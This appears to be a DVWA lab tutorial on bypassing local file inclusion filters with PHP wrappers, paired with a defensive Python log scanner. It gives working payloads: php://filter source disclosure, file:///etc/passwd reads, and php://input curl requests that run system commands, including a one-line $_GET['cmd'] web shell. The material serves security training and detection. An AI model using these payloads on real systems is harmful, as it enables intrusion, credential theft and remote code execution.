Originally published on SecurityElites; the canonical, fully updated version of this article is there.
DVWA LAB SERIES
Part of the DVWA Lab Series (30 Labs)
Lab 17 of 30
Local Lab Only: PHP wrapper techniques must only be practised against your own DVWA installation. Using these techniques on unauthorised systems is illegal.
DVWA file inclusion advanced lab (2026): Lab 5 gave you basic LFI using path traversal at Low security. Medium security adds a filter that strips ../ sequences, and High security extends that filter further. Neither level blocks PHP's built-in protocol wrappers, and those wrappers do not use path traversal at all: php://filter reads and encodes source code, php://input executes code from your POST body, and data:// includes inline content. None of these needs ../. The filter blocks what it knows about; these wrappers are something different entirely.
### What You'll Learn in Lab 17
- How php://filter bypasses path traversal filters to disclose source code
- How php://input converts LFI to RCE when allow_url_include is enabled
- How the data:// wrapper inlines code execution payloads
- Read the High security source to identify what is blocked and what bypasses remain
- Understand why blacklist filtering fails against PHP's extensive wrapper ecosystem
40 min · 3 DVWA exercises

### Prerequisites
- Lab 5: File Inclusion basics (Low security LFI understood)
- Lab 14: Security Levels (comfortable reading PHP source)
- DVWA running locally (Lab 1: Setup)

### DVWA File Inclusion Advanced Lab 17 Contents: PHP Wrapper Bypasses
1. Medium Security: What the Filter Strips
2. php://filter: Source Code Disclosure
3. php://input: LFI to RCE
4. High Security: Extended Blacklist and Remaining Bypasses

In Lab 5 you read /etc/passwd using ../../../ path traversal at Low security. Lab 17 applies the same wrapper bypass philosophy as Lab 16's command injection filter bypass: blacklists block known strings, not equivalent alternatives. The DVWA Lab Series shows this pattern across every vulnerability type.
### Medium Security: What the Filter Strips
MEDIUM SECURITY SOURCE: LFI FILTER

DVWA Medium security filter (View Source reveals this):

```php
$file = str_replace( array( "../", ".." ), "", $file );
```

Only strips: ../ and .. sequences
Does NOT block: php://, file://, http://, data://, etc.

BLOCKED payloads (contain ../):

```
?page=../../../../etc/passwd   → stripped → no traversal
```

WORKING payloads (no ../ required):

```
?page=php://filter/convert.base64-encode/resource=../hackable/flags/fi.php
?page=php://filter/read=string.rot13/resource=index
?page=file:///etc/passwd              # file:// wrapper (absolute path)
```
EXERCISE 1: DVWA (15 MIN)
Use php://filter to Read DVWA Source Code at Medium Security
Time: 15 minutes · DVWA Medium security
php://filter SOURCE CODE DISCLOSURE

Step 1: Set DVWA to Medium security
Step 2: Navigate to the File Inclusion module
Step 3: In the URL bar, change the page parameter:

```
http://localhost/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=index
```

This reads index.php and outputs it base64-encoded.
Output: `PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg==…` (long base64 string)

Step 4: Decode the base64 output:

```
echo 'PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg==' | base64 -d
<?php … // PHP source code of index.php revealed
```

Step 5: Read the file inclusion source file
Step 6: Try reading a configuration file
Result: /etc/passwd contents base64-encoded in page output
What you just learned: php://filter bypasses the Medium security path traversal filter entirely because the payload contains no ../ sequence for the filter to strip. The convert.base64-encode filter chain is particularly useful because the file's bytes are base64-encoded before they reach the PHP parser, so the included file is not executed (as a normal include of a PHP file would be) and its raw source is output instead. This makes php://filter the primary tool for source code disclosure: reading PHP files that would otherwise execute and reveal nothing. In a real web application assessment, php://filter source disclosure often reveals database credentials, API keys, and internal logic that enables further exploitation.
Screenshot the base64-encoded output and the decoded source code. Share in #dvwa-labs on Discord.
### php://input: LFI to RCE
The php://input wrapper reads the raw POST request body. When it is used as the file parameter in an include() call and PHP's allow_url_include=On is set (DVWA's intentional misconfiguration at Low and Medium security), the application includes the POST body as PHP code and executes it. This converts an LFI into Remote Code Execution.
EXERCISE 2: DVWA (12 MIN)
Exploit php://input for Code Execution at Medium Security
Time: 12 minutes · DVWA Medium · Burp Suite or curl
php://input RCE EXPLOIT

Step 1 (curl): POST PHP code to php://input

```
curl -s 'http://localhost/dvwa/vulnerabilities/fi/?page=php://input' \
  --cookie 'PHPSESSID=YOUR_SESSION; security=medium' \
  --data '<?php phpinfo(); ?>'
```

Response: full phpinfo() output, which confirms PHP code execution.

Step 2: Run a command via php://input

```
curl -s 'http://localhost/dvwa/vulnerabilities/fi/?page=php://input' \
  --cookie 'PHPSESSID=YOUR_SESSION; security=medium' \
  --data '<?php system("id"); ?>'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Step 3 (Burp): Intercept any request to the LFI page. Change GET to POST, set the page parameter to php://input, and add the request body `<?php system($_GET['cmd']); ?>`. Then request `?page=php://input&cmd=whoami`.

Check the allow_url_include setting:

```
curl --data '<?php echo ini_get("allow_url_include"); ?>' '[url]?page=php://input'
```
What you just learned: php://input demonstrates the critical difference between LFI (reading files) and RCE (executing code). The transition from reading /etc/passwd to executing arbitrary commands via the POST body is the escalation path that makes file inclusion vulnerabilities Critical severity in production assessments. The allow_url_include check is essential context for reporting: LFI without allow_url_include enabled is High severity (sensitive file disclosure); LFI with allow_url_include enabled is Critical (remote code execution). Always check this configuration setting and include it in the impact assessment section of your report.
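As an added defender-side example (not code from this lab page or from DVWA), the Python below re-implements the Medium filter from the Medium Security section, labels wrapper-based page values with the risk the php://filter and php://input sections describe, and runs that check over constructed Apache access-log lines; the log format, client IP and timestamps are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

def medium_filter(page):
    """Python equivalent of the DVWA Medium filter: str_replace(array('../', '..'), '', $file)."""
    for needle in ("../", ".."):   # PHP applies each needle over the whole string, in order
        page = page.replace(needle, "")
    return page

# Wrapper schemes the Medium filter never touches, paired with the risk a defender reports for each.
WRAPPER_RISK = {
    "php://filter": "source disclosure",
    "php://input": "code execution if allow_url_include=On",
    "data:": "code execution if allow_url_include=On",
    "file://": "arbitrary file read via absolute path",
    "http://": "remote file inclusion if allow_url_include=On",
}

def classify_page(value):
    """Risk label for a wrapper-based page value, or None for a plain path."""
    value = unquote(unquote(value))      # undo single or double URL encoding
    lowered = value.lstrip().lower()     # PHP matches the wrapper scheme case-insensitively
    for prefix, risk in WRAPPER_RISK.items():
        if lowered.startswith(prefix):
            return risk
    return None

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d{3}')

def scan_access_log(lines):
    """Return (ip, method, risk, page) for each request to the fi/ module worth alerting on."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "/vulnerabilities/fi/" not in m["target"]:
            continue
        for page in parse_qs(urlsplit(m["target"]).query).get("page", []):
            risk = classify_page(page)
            if risk is None and medium_filter(page) != page:
                risk = "path traversal attempt (stripped by the Medium filter)"
            if risk:
                hits.append((m["ip"], m["method"], risk, page))
    return hits

SAMPLE_LOG = [  # constructed sample lines in Apache combined-log style, not real traffic
    '10.0.0.5 - - [02/Jan/2026:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 4120',
    '10.0.0.5 - - [02/Jan/2026:10:00:09 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../etc/passwd HTTP/1.1" 200 4120',
    '10.0.0.5 - - [02/Jan/2026:10:00:17 +0000] "GET /dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 9310',
    '10.0.0.5 - - [02/Jan/2026:10:00:25 +0000] "POST /dvwa/vulnerabilities/fi/?page=PHP%3a%2f%2finput HTTP/1.1" 200 612',
]
```

Running scan_access_log(SAMPLE_LOG) ignores the benign include.php request and returns three alerts: the traversal attempt the Medium filter neutralises, the php://filter source read, and the mixed-case, URL-encoded php://input POST.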
This article was originally written and published by the SecurityElites team.